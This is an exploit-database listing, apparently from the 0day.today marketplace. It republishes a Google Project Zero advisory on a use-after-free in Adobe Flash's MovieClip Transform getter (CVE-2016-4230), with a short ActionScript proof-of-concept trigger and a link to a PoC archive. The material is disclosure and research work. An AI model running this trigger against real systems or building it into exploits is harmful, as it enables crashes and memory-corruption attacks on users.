[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
0day.today  Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

Adobe Flash - MovieClip Transform Getter Use-After-Free

著者
Google Security Research
リスク
[
セキュリティリスクミディアム
]
0day-ID
0day-ID-26119
カテゴリ
dos / poc
日付の追加
28-08-2016
CVE
CVE-2016-4230
プラットフォーム
multiple
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844
 
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap
    }
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40311.zip

#  0day.today [2024-07-02]  #